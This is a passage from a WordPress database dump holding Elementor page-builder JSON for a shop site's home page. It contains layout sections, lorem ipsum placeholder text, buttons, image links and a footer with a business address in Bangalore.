"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#0000007D\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"979ed75\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b78a11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\",\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"970607c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#F78A00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f16dea3\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"cc1fd22\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"f37b36f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fa36b21\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo<\\/p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"aa95f02\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#FF6E00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"374288e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"30868ff\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"_margin\":{\"unit\":\"px\",\"top\":\"19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"50ce1c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\",\"background_background\":\"classic\",\"background_color\":\"#C3C3C321\"},\"elements\":[{\"id\":\"6cb9f56\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d4fc894\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"List Item #1\",\"selected_icon\":{\"value\":\"\",\"library\":\"\"},\"_id\":\"99391c3\"},{\"text\":\"List Item #2\",\"selected_icon\":{\"value\":\"\",\"library\":\"\"},\"_id\":\"6156b25\"},{\"text\":\"List Item #3\",\"selected_icon\":{\"value\":\"\",\"library\":\"\"},\"_id\":\"59990f4\"},{\"_id\":\"470f418\",\"text\":\"List Item\",\"selected_icon\":{\"value\":\"\",\"library\":\"\"}}]},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false},{\"id\":\"0e3e07c\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"c2e40a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f78ed1a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"39b0f4e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e9c825a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":125,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"152\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(8387,1472,'_elementor_page_assets','a:0:{}'),(8389,1473,'_elementor_edit_mode','builder'),(8390,1473,'_elementor_template_type','wp-page'),(8391,1473,'_elementor_version','3.7.7'),(8392,1473,'_wp_page_template','elementor_canvas'),(8393,1473,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#0000007D\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"979ed75\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b78a11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\",\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"970607c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#F78A00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f16dea3\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"cc1fd22\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"f37b36f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fa36b21\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo<\\/p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"aa95f02\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#FF6E00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"374288e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"30868ff\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"_margin\":{\"unit\":\"px\",\"top\":\"19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"50ce1c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\",\"background_background\":\"classic\",\"background_color\":\"#C3C3C321\"},\"elements\":[{\"id\":\"6cb9f56\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":0},\"elements\":[{\"id\":\"d4fc894\",\"elType\":\"widget\",\"settings\":{\"view\":\"\",\"icon_list\":[{\"text\":\"List Item #1\",\"selected_icon\":{\"value\":\"\",\"library\":\"\"},\"_id\":\"99391c3\"},{\"text\":\"List Item #2\",\"selected_icon\":{\"value\":\"\",\"library\":\"\"},\"_id\":\"6156b25\"},{\"text\":\"List Item #3\",\"selected_icon\":{\"value\":\"\",\"library\":\"\"},\"_id\":\"59990f4\"},{\"_id\":\"470f418\",\"text\":\"List Item\",\"selected_icon\":{\"value\":\"\",\"library\":\"\"}}],\"icon_align\":\"center\",\"divider\":\"yes\",\"divider_style\":\"dotted\",\"divider_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"32\",\"right\":\"32\",\"bottom\":\"32\",\"left\":\"32\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false},{\"id\":\"0e3e07c\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"c2e40a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f78ed1a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"39b0f4e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e9c825a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":125,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text 